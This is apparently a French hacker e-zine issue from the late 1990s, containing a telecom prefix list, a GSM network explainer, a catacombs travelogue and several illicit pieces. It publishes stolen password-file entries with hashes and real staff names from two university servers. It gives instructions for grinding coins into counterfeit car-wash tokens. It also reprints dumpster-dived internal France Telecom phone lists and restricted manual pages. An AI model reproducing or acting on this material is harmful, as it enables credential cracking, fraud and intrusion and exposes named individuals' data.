1616 | AXS
1617 | INFOTEL
1618 | WORLDCOM
1620 | INTEROUTE
1623 | VIATEL
1626 | A TELECOM (AXIS)
1630 | KERTEL (PINAULT) <<<--- ouaish ouaish ;)
1633 | GLOBAL ACCESS
1639 | FIRST TELECOM
1640 | KAT' AQUITAINE
1654 | ESTEL (STRASBOURG)
1655 | WESTERN TELECOM <<<--- mes p'tits cowboyz ;)
1656 | PRIMUS
1659 | BELGACOM
1660 | UNIGLOBE
1661 | RSC COM
1670 | GOLDEN LINE
1677 | PHONE SYSTEMS
1678 | WORLDXCHANGE
1682 | KDD
1688 | LDI
1690 | COLT
1696 | ECONOPHONE


(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Password FILE ) 2.8 ( Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)



Suite a mon article du N°1 j'ai reçu plusieurs mails me disant: "ouais c'est
kewl ta rubrique mais j'aimerais que tu nous montres la methode pour l'avoir,
patati patata ..."
A ceux là je reponds par 2 choses : un articles sur les
exploits UNIX est en preparation, les méthodes n'ont absolumnent rien
d'extraordinaires ces des exploits connus qu'on peut trouver sur rootshell et
compagnie (bug sendmail, cgi etc ...) alors je vais pas reexpliquer ces
methodes archi maintes fois rabachées !

Bon bah ce mois ci je vous donne 2 passwords file d'université l'un en
Angleterre, et l'autre aux States (petit coucou aux admins). Je lance aussi
un grand sondage pour ou contre cette rubrique vous m'envoyez votre vote sur
Aaah@mail.dotcom.fr SI YA MOINS DE 10 VOTES J'ARRETE CETTE RUBRIQUE !


==========================================================================

www.cl.cam.ac.uk: Computer LABORATORY university of CAMBRIDGE
****************

root:RK2fP/SciTdfE:0:1:Root:/:/bin/sh
daemon:*:1:1:system background account:/:
bin:*:3:4:system librarian account:/bin:
uucp:*:4:39:UUCP/FAX gateway:/var/spool/fax:
fax:*:4:39:Facsimile Agent:/var/spool/fax:
tcb:*:9:18:Trusted Computing Base:/tcb:
adm:*:10:32:Administration Subsystem:/usr/adm:sr/opt/amanda:/dev/null
ileaf:*:79:1:Interleaf:/usr/groups/interleaf:/dev/null
sendmail:*:83:1:Sendmail:/:/dev/null
mentor:v3r/pSTrKCz0w:89:72:Mentor:/usr/groups/mentor:/dev/null
maj:KyaXu2IXS07oA:101:20:Martyn Johnson:/home/maj:/usr/bin/bash
pb:rL999AvVVuudM:104:20:Piete Brooks:/home/pb:/usr/bin/bash
gt19:u1/WUQKpCFVlk:178:20:Graham Titmus:/homes/gt:/usr/bin/bash
gt:u1/WUQKpCFVlk:178:20:Graham Titmus:/homes/gt:/usr/bin/bash
gtcsh:ZoaJBDqJXVMq.:178:20:Graham Titmus:/homes/gt:/bin/csh
ckh:lbuRVWtVkFX5w:1167:20:Chris Hadley:/homes/ckh:/usr/bin/bash


rocket.cc.umr.edu: Un server de l'universite du Missouri-Rolla
*****************

root:9ZW.ILIJpPQ72:0:3::/:/sbin/sh
daemon:*:1:5::/:/sbin/sh
bin:*:2:2::/usr/bin:/sbin/sh
troot:kerberos:0:0:AFS Base
Root User:/afs/umr.edu/software/sysprog/troot:/umr/bin/tcsh
ff:kerberos:1017:5000:Bruce McMillin:/afs/umr.edu/users/ff:/bin/csh
jlu:kerberos:2435:5000:Jui-Lin Lu:/afs/umr.edu/users/jlu:/umr/bin/tcsh
rms:kerberos:5002:5000:Richard

Ceci est un résumé du password file en effet il y 1500 logins avec KERBEROS.
Kerberos k'est ce que c'est ? c'est un systeme de password temporaire qui
change tres souvent, d'ou la présence de kerberos a l'emplacement du password
crypté.


-=-

Je compte sur vos contributions ou collaborations. Aaah@mail.dotcom.fr




(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Elephant bleu ) 2.9 ( ced99 (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)



INTRO

Les stations de lavage Elephant bleu sont gerees par la societe Hypromat lavage.
Cette societe est tres bien implantee en FRance et en Europe. D' ou l excellente idee
de produire un jeton universel.Comme une station de lavage coute tres chere, hypromat
utilise des monnayeurs peu perfectionnes.Le systeme de detection de la piece est base
sur trois principes:

* Mesure de l epaisseur
* Mesure de la largeur
* Identification de l alliage

Il ne reste plus qu a fabriquer ses jetons. Facile, non !
D' autres methodes pour cracker ces monnayeurs existent, par exemple injecter de l eau
dans le monnayeur grace a la lance ou a passer un tournevis pour provoquer un court-
circuit dans la partie electronique.
Ces procedes sont peu fiables et aleatoires.Et puis PEACE and LOVE nous ne sommes pas
des vandales.

CONCEPTION

Donc il ne reste plus qu' a fabriquer ces jetons. Le plus difficile est l alliage.Mais
en regardant de plus pres ce fameux jeton on s' apercoit qu il nous est tres familier.
En fait la piece de 50 centimes lui ressemble etrangement.Bizarre, non.Vous me direz a
quoi sert de payer des ingenieurs ? Les modifications a apporter a cette piece sont
minimes. le seul materiel a utiliser est une meule ou une lime si le courage vous en
dit.
Mais prenez plutot une meule c est plus rapide.Commencez par usiner le contour de la
piece.A l origine cette piece possede des peites fentes;ils faut les faire
disparaitre entierement.ATTENTION a ne pas trop usiner la piece sinon apres la piece ne
sera plus reconnue.
La deuxieme etape est d' usiner les 2 faces, il faut eliminer le petit rebord autour de
la piece. UNE fois de plus attention, l' usinage doit etre etre tres minutieux.Avec
l habitude, ca va tres vite.
Le resultat n est pas sur a 100%. Usinez plusieurs pieces et essayez-les. Si une
piece ne passe pas dans un monnayeur, cela ne veut pas dire qu elle ne passe pas dans
celui d'a cote.

Le seul moyen pour hypromat de contrer cette fraude serait deja de renvoyer les
monnayeurs pour les retalonner plus precisement (seules 3 societes en france
reprogramment les monnayeurs), de changer ces jetons qui ont a peine un an de service
et ki sont distribues dans toute l' europe.
Cette modification fonctionne pour le lavage (equivaut a une piece de 10 frs) mais
aussi pour l aspirateur dans certains centre de lavage.
ATTENTION a ne pas utiliser ces pieces lorsque le cum qui remplit les bidons de savon
est dans le coin.

INFOS: Certaines pieces provenant des antilles et de la polynesie francaise sont
reconnues dans certains distributeurs comme des pieces de 20 frs.

BY ELEPHANT MAN FOR CRYPTEL.



(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Paris Underground ) 2.10 ( vatoo (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)


GSM, standard europeen de la telephonie mobile

Le systeme GSM (Global System for Mobile communications) a ete defini
a la fin des annees 80 par des operateurs et des industriels reunis par
l' Etsi (European Telecommunications Standard Institute). L' objectif
etait de creer une norme eyropeenne de telephonie cellulaire numerique
palliant les lacunes des systemes de telephonie cellulaire analogique
(taille importante des mobiles, incompatibilite entre les pays, non
confidentialite des communications, et efficacite spectrale faible).
L' evolution rapide du marche a favorise la creation de portables de
petite taille, offrant une bonne qualite d' ecoute, et utilisables
partout en Europe. La norme GSM constitue aujourd' hui une reference
mondiale, sauf aux Etast-Unis, ou les technologies CDMA-TDMA dominent.
En France, 3 operateurs ont obtenu une licence permettant de
developper un reseau GSM. Ainsi, Bouygues Telecom, France Telecom
Mobiles et SFR developpent constamment l' infrastrucutre de leur
reseau, c' est a dire les equipements qui raccordent les telephones
mobiles au RTC (Reseau telephonique commute, voir CRYPTEL #1). La
liaison entre telephones mobiles s' effectue via des stations relais
radio. Chacune d' elles assure la communication radio avec les mobiles
dans une zone geographique precise, appelee cellule. La qualite et la
disponibilte du service etant liees a la qualite des communications
radio, il est necessaire soit d' augmenter la puissance des mobiles
(ce qui en augmente la taille), soit de multiplier le nombre de ces
stations relais radio. Ainsi se sont installees sur le toit des
immeubles des antennes assurant la communication avec les mobiles.
La repartition geographique des relais radio depend de la densite
de trafic estimee. A la campagne, les cellules, moins nombreuses,
se deploient dans un rayon large (35 km environ). En revanche, en
ville, ou le trafic est beaucoup plus important, les cellules
couvrent une superficie reduite (300m de rayon environ). On parle
alors de microcellules. L' ensemble des cellules du reseau d' un
operateur forme le PLMN, auquel est attribue un ensemble distinct
de frequences. Cela permet aux reseaux Bouygues Telecom, Itineris
et SFR de couvrir la France, sans que les interfaces ne viennent
parasiter les communications.

Le PLMN, une architecture complexe

L' utilisateur peut appeler un correspondant (et etre appele)
quelle que soit la cellule dans laquelle il se trouve. S' il est
impossible d' affecter de maniere fixe les canaux radio aux
differents abonnes, il est necessaire d' allouer dynamiquement
les differentes ressources physiques aux echanges logiques
relatifs aux abonnes presents dans les cellules. Cette fonction,
appelee la gestion des ressources radio (RR), fournit une
meilleure efficacite spectrale que ne le faisaient les anciens
systemes analogiques de telephonie mobile. Elle acroit la
capacite de trafic et le nombre d' utilisateurs du reseau de
telephonie mobile. La gestion de la mobilite est une autre
fonction essentielle de ce type de reseau, qui inclut la
localisation des mobiles en veille ainsi que l' etablissement
et la maintien des comms pendant un deplacement (hand-over).
L' infrastructure d' un reseau de telephonie mobile, ou
PLMN, est composee de trois sous-systemes: le sous-systeme
radio (BSS), le sous-systeme d' acheminement dans le reseau
(NSS), et, enfin, le sous-systeme d' exploitation (OSS).
Le premier est un modem qui assure la gestion des ressources
radio indispensables aux echanges avec les mobiles, et le
transfert des comms entre les mobiles et le NSS. L' interface
mobile-NSS est appelee interface Air. Elle offre une bonne
qualite de service grace a la transmission numerique et au
codage de la voix. La confidentialite des communications
est assuree par le chiffrement des echanges. L' interface Air
est caracterisee par un schema d' acces multiple a la fois
frequentiel et temporel, qui a pour nom TDMA. Sur chaque
frequence emise par un relais radio, on obtient une decoupe
des trames en 8 intervalles de temps. Les couples (frequence
et intervalle de temps) constituent les ressources radio
physiques qui sont attribuees par configuration aux
differents canaux logiques de controle, de signalisation
et de trafics necessaires aux echanges entre les mobiles
et les BSS, sous-systeme radio constitue de plusieurs
types d' equipements, dont les BTS. Les BTS sont les
stations de base qui assurent le couplage radio avec les
mobiles sur l' interface Air. Ils effectuent egalement le
multiplexage des trames TDMA, le traitement du signal de
parole (modulation, demodulation, codage canal, chiffrement
et transcodage GSM-MIC, modulation par impulsion et codage)
ainsi que les mesures de puissance des mobiles pour assurer
une bonne qualite de communication. Les BTS sont pilotes
par le controleur de station de base (BSC). Cet organe
intelligent du BSS concentre les circuits de parole et de
donnees vers le sous-syteme d' acheminement dans le reseau
NSS. Il gere les ressources radio physique et les canaux
logiques, et alloue ces derniers aux appels qu' il traite.
Le BSC administre la mobilite des abonnes entre les cellules
qu' il pilote. Enfin, il realise le controle des mobiles,
tant en matiere de puissance d' emission que de
synchronisation temporelle. Les BTS d' un BSS sont relies
aux BSC par des liaisons MIC a 2 Mbit/s. Sur ces liens
transitent les comms vocales ou de donnees, ainsi que la
signalisation BTS-BSC, MS-BSC et MS-MSC. La signalisation
utilise le protocole LAPD (Link Access Protocol Digital)
pour la couche de liaison de donnees.

Le commutateur, lien entre le fixe et le mobile

La deuxieme partie d' un reseau de telephonie mobile
comprend le NSS, sous-systeme en charge du traitement
d' appel, de la connexion au reseau telephonique, et
de la gestion des abonnes. Il est interface avec plusieurs
BSS, et a un role de concentration et de commutation des
comms. Un NSS se compose des enormes bases de donnees
relatives aux abonnes (HLR) et a la localisation des mobiles
(VLR). Les commutateurs, baptises MSC, sont le plus souvent
dotes des commutateurs du RTC, auxquels les fonctions
specifiques du GSM ont ete ajoutees par les mecanismes de
reseau intelligent. Ils etablissent les appels entre les
mobiles et les abonnes fixes, ou entre les mobiles, et
incluent les fonctions de traitement des appels (CC),
de gestion de la mobilite (MM), d' echange des messages
courts (SMS, Short message services), et d' administration
des services supplementaires (SS). Certains d' entre eux
sont interfaces avec le centre a autonomie d' acheminement
(CAA) du RTC, ils sont alors denommes GMSC ou passerelles
MSC. Le trafic entre les MSC peut etre achemine par le RTC.
Mais depuis quelques annees, l' operateur d' un reseau de
telephonie mobile (PLMN) peut utiliser sa propre
infrastructure de transmission pour etablir des circuits
de parole entre les MSC. L' acheminement des appels est
alors conduit par le PLMN jusqu' a un GMSC, qui transmet
l' appel au CAA auquel il est connecte. Chaque MSC est
couple a une base de donnees qui recueille les donnees
d' acheminement relatives aux abonnes visiteurs situes
dans une zone precise (VLR). Une deuxieme base de
donnees (HLR) contient les infos relatives aux abonnes
telles que les services souscrits, leur identification,
leur numero d' annuaire, ainsi que la reference du VLR
correspondant a la localisation de l' abonne. Un PLMN
pourra contenir un ou plusieurs HLR selon le nombre
d' abonnes. Pour la partie controle, le reseau de
telephonie mobile dispose d' un centre
d' authentification (AuC).

NSS et BSS relies par interface normalisee

Cet equipement gerant les cles de securite de chaque abonne
est souvent situe sur la meme machine que le HLR. Le centre
d' identification (EIC, Equipment Identification Center), lui,
contient les infos necessaires pour verifier que le mobile est
autorise sur un reseau. Pour relier les deux sous-reseaux,
NSS et BSS, les operateurs mettent en oeuvre une interface
bptisee A. Grace a cette normalisation, ils peuvent interconnecter
les equipements NSS et BSS de differents constructeurs. Les
controleurs des stations de base (BSC), eux, sont relies aux
MSC par des liaisons MIC a 2 Mbit/s par lesquelles transitent
les comms avec les mobiles et la signalisation MS-MSC ou
BSC-MSC. La signalisation utilise les protocoles du reseau
semaphore SS7 et une couche specifique au GSM, appelee BSSAP.
Les divers MSC d' un PLMN sont aussi relies par des liaisons
MIC, qui vehiculent les circuits de parole. L' echange de
signalisation entre les constituants du NSS est realise par
le reseau semaphore SS7 associe au PLMN, auquel a ete ajoute
le protocole MAP (Mobile Application Part). L' interface
MSC-HLR est normalisee pour autoriser les echanges de
signalisation entre PLMN lorsque les mobiles sont utilises
a l' etranger. L' interface PLMN-RTC ou PLMN-RNIS est realisee
par les passerelles GSMC connectees au CAA par des liaisons
MIC a 2 Mbit/s et par le reseau semaphore SS7.


Questions/reponses:


Q- Comment un utilisateur est-il identifie ?

R- >>Etape1:Quand un mobile fonctionne, il parcourt les
frequences et recherche les canaux de controle emis par les
stations de base (BTS) afin de se synchroniser en frequence
temporellement.Le mobile ecoute les infos systemes diffusees
par les BTS pour recueillir toutes les infos sur le reseau.

>>Etape2:Une fois que la station de base susceptible de lui
fournir la meilleure qualite radio a ete retenue, le mobile
demande un canal de signalisation dedie, alloue par le
sous-systeme radio (BSS)

>>Etape3:Ce sous-systeme etablit une connexion SS7 avec
le commutateur du reseau (MSC).

>>Etape4:Quand le mobile a signale sa presence au commutateur
MSC visité, celui-ci met l' identite du mobile dans les bases
de donnees locales centralisees.

>>Etape5:Le commutateur fournit au mobile une identite provisoire
qui sera ensuite utilisee pour les echanges entre le mobile et
le reseau.


Q- Qu' est-ce que la puce SIM ?

R- Chaque abonne GSM recoit une carte a puce denomme carte SIM
(Subscriber Identification Module), qui constitue sa carte
d' identite sur le reseau. Cette carte renferme les informations
necessaires pour acceder au reseau d' un operateur. Elle existe
sous deux types de formats: carte de credit et miniature. La
carte SIM contient des caracteristiques du reseau (identite du
PLMN et plage de frequences utilisee), des parametres d' abonnement
(identite internationale de l' abonne et services demandes), des
donnees de securite (mot de passe de l' abonne ainsi que cle
d' authentification et de chiffrement), des informations sur la
mobilite (identite provisoire et indicateur de zones de
focalisation) et, enfin, des donnees temporaires comme les
messages courts recus.


Q- Quelles sont les etapes d' un appel d' un poste fixe a un mobile ?

R->>Etape1:L' abonne du reseau de telephonie fixe compose le numero
de l' abonne mobile (MSISDN). Celui-ci est de la forme
ID Z AB PQ MCDU. L' ID est l' indicatif du pays (33 pour la France);
Z indique la zone (Z=06, qui est reserve pour les mobiles); AB est
l' indicatif attribue a chaque operateur (07 et 08 pour FT, 60 pour
Bouygues, 09 pour SFR); PQ identifie le HLR, et MCDU l' abonne.

>>Etape2:L' appel est transmis au commutateur d' acheminement (CAA)
auquel l' abonne fixe est connecte.

>>Etape3:L' appel est aiguille vers le commutateur passerelle (GMSC)
le plus proche du reseau mobile.

>>Etape4:Pour connaitre les informations sur l' abonne mobile, ce
commutateur passerelle interroge la base de donnees centralisee (HLR).

>>Etape5:Le HLR interroge a son tour la base de donnees locale (VLR)
du commutateur (MSC) pour localiser le mobile.

>>Etape6:En retour, la base de donnees locale fournit a la base de
donnees centralisee un numero provisoire (MSRN).

>>Etape7:La base de donnees centralisee informe le commutateur
passerelle du numero provisoire pour pouvoir joindre directement le
commutateur visite par le mobile.

>>Etape8:Le commutateur passerelle va etablir un appel vers le
commutateur concerne.

>>Etape9:Le commutateur recherche le mobile en demandant une
procedure de recherche (paging) au controleur de stations de base
(BTS) du sous-systeme radio concerne (BSS).

>>Etape10:Le BSS diffuse alors la recherche (numero provisoire
du TMSI) sur toutes les stations de base (BTS).

>>Etape11:Une fois le mobile repere, le BSS lui alloue un canal
de trafic. Le circuit de parole est etabli entre le mobile et
l' abonne fixe a travers ce canal de trafic. La conversation
peut alors commencer (enfin!).


Q- Quelles sont les etapes d' un appel d' un mobile a un poste fixe?

R->>Etape1:Le mobile utilise le canal de signalisation pour
s' identifier aupres du reseau, etablir le chiffrement, et demander
au commutateur visite l' etablissement de l' appel sortant.

>>Etape2:L' analyse du numero de l' appelant dans la base de donnees
centralisee permet au commutateur de constater que le numero
appartient au reseau fixe.

>>Etape3:La base de donnees centralisee (HLR) recherche l' adresse du
commutateur passerelle (GMSC) auquel est rattache l' abonne fixe.

>>Etape4:La base de donnees HLR communique cette adresse au
commutateur MSC relie au BSS, sous-systeme radio sur lequel
l' utilisateur mobile est raccorde.

>>Etape5:Le commutateur aiguille alors l' appel vers ce commutateur
passerelle MSC.

>>Etape6:L' appel est route vers le centre d' acheminement auquel
l' abonne fixe est connecte.

>>Etape7:Le centre d' acheminement entre en contact avec l' appele,
et la communication peut alors s' etablir.

>>Etape8:Le commutateur demande au sous-systeme radio (BSS) d' allouer
un canal de trafic.

>>Etape9:Le canal de signalisation est libere, et le circuit de parole
est etabli entre le mobile et l' abonne fixe.

>>Etape finale:Lorsque l' un des deux abonnes raccroche, un dialogue
de fin d' appel se deroule entre le commutateur et le mobile, et le
canal de trafic est libere.


(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) TrAsH FT ) 2.11 ( Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)


Malgre les -10°c, le vent, le froid, la neige, la pluie, le gele, le verglas,
l'ouragan, le typhon, le cyclone, la dépression polaire arctique et antarctique
(bon on va peut etre s'arreter là) Aaah a bravé les intempéries pour aller trasher
chez FT. Tan Tan Tan héroique non ? :-) Bon ca a pas ete une mince affaire parce
que la poubelle que je visais ce soir là etait en plein champs de vision du
gardien ... dur ... enfin j'ai profité d'un instant ou il lavait sa vitre pour
m'emparer d'un sac poubelle et disparaitre dans la nuit pour aller accomplir
mon devoir ... Tan Tan Tan.

Bon alors y avait pas mal de truc dans cette poubelle on va commencer par
les trucs FUN :
- Le journal syndical de la CGT : NON AU 35 HEURES ! (ça promet)
- Une tonne indescriptible de mégots et cendres (zont nerveux chez ft ?)
- Du détergeant chimique (ça c pas cool j'ai eu des taches ...)
- et cerise sur le gateau : du pq ... on aura tout eu dans celle là ...
- J'oubliais l'apotéose un mail envoyé a une employé qui ressemblait fort a
une invitation dans un secte ("venez entendre la voie de la raison")

Plus sérieusement j'ai trouvé quelque trucs interressants :
- Un CD-Rom en cours d'analyse (bah oui il est abimé) une chose est sur le
parc informatique pour les employés de FT c win 98/95 et NT

- Une liste des badges ayant acces à certains niveaux de sécurité dans le
batiment. Je ne la publierai pas tout simplement parce qu'elle ne sera
d'aucune utilité pour vous :-) et ça indiquera trop vite à FT ou j'ai trashé
(quoi qu'a mon avis c facil à deviner)

- Une liste (celle ci beaucoup plus instructives) comprenant plusieurs N°
de tel et jargon technique que je n'arrive pas à définir. Je vous publie
cette liste si qqun aurait la définition de certains trucs ou peut tout
simplement éclairer ma lanterne, un petit mail sera le bienvenu
(Aaah@mail.dotcom.fr)



Nom du centre: CPRI: N° COLISEE FAX: RESEAU:
======================================================================
Amiens Lille 277 111 / 277 406 0322537280 0322537111
======================================================================
Andilly 209 690 / 209 611 0134329608 0134329611
======================================================================
Angers Nantes 0241607515
======================================================================
Annecy 227225/227228/227457 0450667449 0450667444
227111/227459
======================================================================
Archives Sebastopol 207460/207111/207419 0148017499
208123 7111
======================================================================
Arpajon Villabe 0164900823
=======================================================================
Aubervilliers 215005/215111/215004 0148115111
215007 GEB 0143525718
=======================================================================
Auber DRIF 0143525150 GLM 0148341717
=======================================================================
Auber GEB 0143525113
=======================================================================
Auxerre Dijon GET: 0386493590 0386522941
=======================================================================
Bagnolet 268574 CONS: 268488 0149938574
=======================================================================
Bayonne 0559526196
=======================================================================
C.I.P.B 206401 / 0142446262
=======================================================================
Beauvais Amiens CPE: 0344841392
=======================================================================
Bercenay 267114
=======================================================================
Besancon 207111/257444/257448 0381801389
257455 277449
=======================================================================
Bessancourt Eragny 209 111 / 209 356 0130403904
=======================================================================
Bordeaux 243111/243408/243404 0557813401
S 243444 243 429
=======================================================================
Bordeaux mer 243528
=======================================================================
Caen academie 231111/231608/231629 0231251120 0231251111
=======================================================================
Caen ven GET 231227/231228 0231251111
CONS: 231241
=======================================================================
Chartres Orleans CPE: 0237208739
=======================================================================
Chateauroux Tours 0247405381/82
=======================================================================
Chenneviers 219527/219528 CONS: -524 SUP: -523 0149629429
0149629111
=======================================================================
Chenne HZ 219402
=======================================================================
Clamecy Auxerre CPE: 0380303456
=======================================================================
Clermont FD 225832/225802 0473425700
=======================================================================
Corbeil Villabe 201111 commut: 201470 0169114513
=======================================================================
Creil Amiens 0344281020
=======================================================================
Dijon 256111/-454/-325/-258 CONS: 256455
=======================================================================
Douai Lille 254 359
=======================================================================
Echiquier Sebastopol 207111/207379/S:207719/ 207412 014817111
=======================================================================
Evreux CPETRAN: 0232315730
=======================================================================

Voilà ça c'est qu'une 1ere partie j'ai toute une liste des villes par ordre
alphabétique, si qqun veut la suite il me mail je lui envoie et il en
profite pour m'expliquer un peu ce truc parce que là j'avoue je nage ...
(CPE? Colisee ? CONs, GLM, GET, GSP etc ... :-)

- Un dernier tres interressant malheureusement je n'ai pas eu le fichier
entier j'en ai que 3 pages : Le manuel utilisateur du PM2 à diffusion contrôlée.
C'est dommage que j'ai 3 pages sur 69 mais bon je garde espoir de le retrouver
entier lors d'un prochain trash :-)


II Procedures de connexion et de deconnexion
********************************************
1.1 Connexion
L'acces PM2 se fait viale réseau x25. Tapez le numéro d'acces à PM2 sur votre
terminal et validez
## ## ##
Apres le message d'acceuil notifiant votre enregistrement tapez:
CN MP2
Puis votre identifiant
######
ensuite votre mot de passe
######

Le mot de passe vous est délivré par la Direction d'apllication MP2
Tel: 0141375168 - 0141675299 - 0141675298
Fax: 0141675169
*/C aaah la qui parle je vous demande de pas appeler ou tenter un social
en ardos sans rien sous le bras grillépas tout de suite ce numéro\*

L'ecran suivant apparait:

----Informations PM2-23B --------- MENU GENERAL --------- ABANDON (nul):
************
INFO EXPLOITATION DU 14/01/98 ------------------------------------------
*************** Le numero du centre de calcul est le 0141675449 ********
Le 14/01/98 a 8h30 reste a reemettre: 378 os dans TEMILEX
a 14h reste a reemettre: os dans TEMILEX
PB pour reemission os du password = support FONCT 23B au 0141675295/96/97
PB password PM2 = support fonctionnel PM2 au 0141675168
************************************************************************
INFO 23B du 09/01/98 ---------------------------------------------------
************************************************************************
* *
* AUX UTILISATEURS: merci de signaler les incidents sur le V60 aux sup *
* fonct un cadeau sur INF23B *
* *
************************************************************************

INFO PM2 du 23/08/95 ---------------------------------------------------
`INF` permet de consulter les numeros de FAX des destinataires RECTIF
Modification du numero de FAX du centre CARNOT : 40545232 devient 44151212

-------------------------------------------------------------------------

Vous etes maintenant connecte au TDS de M2/23B. Sans vous preoccuper de
positioner quelconque curseur tapez encore:
PM2
Vous etes maintenant connecte a PM2 (voyez page suivante les ecran d'accueil
que vous faites defiler en appuyant sur la touche TRANS ou RETURN et vous
pouvez commencer toute consultation de votre choix (voir la liste des
consultations possibles plus loin dans ce manuel)

[FIN DE PAGE 6/69] j'ai pas la suite ... si qqun a mailez moi



Autre page du manuel:
DEMANDE D'EXTRACTION (suite)
****************************

L'ecran suivant apparait:
-------------------------

CREATION CTL:_____
SELECTION DES EDITIONS
CODE SITE DESTINATAIRE:_

1- EDITION DES BLOCS
2- EDITION DES BLOCS AVEC ROUTAGE
3- EDITION DES ENSEMBLES DE SECURISATION
4- EDITION DES SECTIONS
5- EDITION DES SECTIONS D'UN CENTRE OU D'UN REPARTITEUR
6- EDITION DES SECTIONS AVEC ROUTAGE
7- EDITION DES TRONCONS
8- EDITION GLOBALE DES COFFRETS
9- EDITION PARTIELLE DES COFFRETS
10- EDITION DES MOUVEMENTS DES CASES DE COFFRETS
11- EDITION DES LIAISONS SPECIALISEES
12- EDITION DES PLANS DE CABLAGE
13- EDITION DISPONIBILITE DES BLS
14- EDITION PARTIELLE DE BPN

NUMERO D'EDITION: __
DERNIERE DEMANDE CREE: 09553


Tapez "G" (comme Noisy-le-Grand) dans le champ <CODE SITE DESTINATAIRE>,
choisissez l'edition qui vous interesse,
Validez,
Servez l'ecran correspondant à votre demande et validez les parametres que
vous venez de saisir sur ce dernier écran.
Notez bien alors le numéro d'édition affiché à la ligne DERNIERE DEMANDE CREE
c'est lui qyu vous permettra de modifier (type2 du contexte de travail) ou de
supprimer (type 4 du contexte de travail) votre demande.
N'oubliez pas d'inscrire le champ <OBSERVATIONS> l'adresse ou devra etre
envoyé le listing par la cellule PM2.
si vous avez demandé une sortie disquette, telephonez au 0141675299 en donnant
votre code demandeur et le numéro de votre demande.
En vous mettant le lendemain en mode "MODIFICATION" et en rappelant votre
demande vous saurez si votre demande a ete traitee.

Remarque: certaines editions ne sont possibles qu'a partir du superviseur PM2.
Telephonez

[FIN PAGE 66/69]

Voilà cette machine a l'air vraimment interessante, si qqun a la doc
(on sait jamais) + d'infos sur ce systeme, etc bah vous connaissez ma phrase
rituelle : mailez moi Aaah@mail.dotcom.fr.

Participez on va pas tout faire !

Resultat de trash RDV au numéro 3



(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Paris Underground ) 2.12 ( vatoo (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)



Une visite du sombre monde sous la ville lumiere- par murray battle,
traduit et adapte par vatoo.

Une visite non-guidee des catacombes Parisiennes. La vision est fantastique - des
murs entiers d' os et de cranes entremeles, des galeries symetriques. C' est un vrai
contraste avec les reelles catacombes, a ce que j' ai appris plus tard. La plupart
des touristes etrangers n' ont aucune idee de ce qui se passe en ces lieux. Il y a
un grand nombre de citations, dont ma preferee: "Insense que vous etes, Pourquoi
vous promettez-vous de vivre longtemps , vous qui ne pouvez compter sur un seul jour"
.
Nous apparaissons dans une grande allee, loin de notre point de depart, il fait chaud,
c' est tres sombre, et je me sens un peu impressionne. Je suis ici a Paris pour
comprendre pourquoi les gens vont dans ces sous-sols. Cela parait totalement
irrationnel. Nous finissons tous ici, 6 pieds sous terre. Pourquoi accelerer le
processus? Emmanuel Gabily va me servir de guide dans l' underground. Je le trouve
inquietant. Nous nous sommes rencontres sur le net et nous sommes a present assis
face a face dans un cybercafe dans un quartier industriel de Paris. Emmanuel est
inquiet a propos de mes bottes. Il pense qu' elles ne sont pas assez hautes. Ce
n' est pas bon signe. Emmanuel n' est pas seul. Il est accompagne d' un garcon
denomme Benito (Benjamin Nitot), qui adore, tout comme Emmanuel, initier des
neophytes.
Nous nous promenons dans la voiture d' Emmanuel, alors que le paysage citadin de
Paris disparait peu a peu. Nous entrons dans la banlieue. Emmanuel connait quelques
caves qu' il desirerait nous montrer. La premiere est faite de craie. Je n' ai pas
une grande impression a ce sujet.

>>La cave de craie
Nous sommes rejoints par trois autres cataphiles hommes, dont l' anglais est aussi
pietre que mon francais. J' attends le dernier moment pour mettre mon casque-torche
de speleologie. L' entree est en fait une fissure de roche, dans des bois eloignes.
Heureusement, il y a une echelle, d' a peu pres 10 m de hauteur. Je suis immediatement
subjugue par la beaute de cet ensemble. Pas de claustrophobie ici. Ce sont plus des
cavernes que des tunnels. Emmanuel laisse sortir un cri - quelque chose qu' apparement
il execute a chaque descente. Il n' y a pas d' echo. Les murs de craie absorbent tout.
Les autres nous rejoignent. Notre guide nous mene par le labyrinthe en ayant jamais
besoin d'une carte. Ca semble bien indique mais je ne pourrais jamais retrouver mon
chemin arrière. Il dirige sa lampe aux points de danger - fissures soudaines, puits
sans fond - aucuns rails de guide ici. Des machines sont abandonnees ici depuis des
decennies. On observe des signes de visitation precedent - bouteilles en plastique,
bidons, batteries jetees. Une echelle rachitique mene vers le haut d un mur emiette,
a un trou de lapin dans le plafond et, des promesses d'Emmanuel, a un niveau superieur.
Nous serrons un par un. Ici, c' est tridimensionnel.Il y a au-dessus de et ci-dessous
et autre ci-dessous et... dans la mesure ou vous pouvez aller. Mais maintenant je
comprends pourquoi on vient ici. Il y a pas loin un balcon - une vue ouverte de la
ligne des tunnels ci-dessous. Et c'est un endroit pour faire le camp. Nous nous
asseyons pour nous reposer. Lentement, sans instruction, chacun arrête sa lampe ou
la lampe-torche pour se trouver dans l' obscurite - totalement noir. Et silencieux.
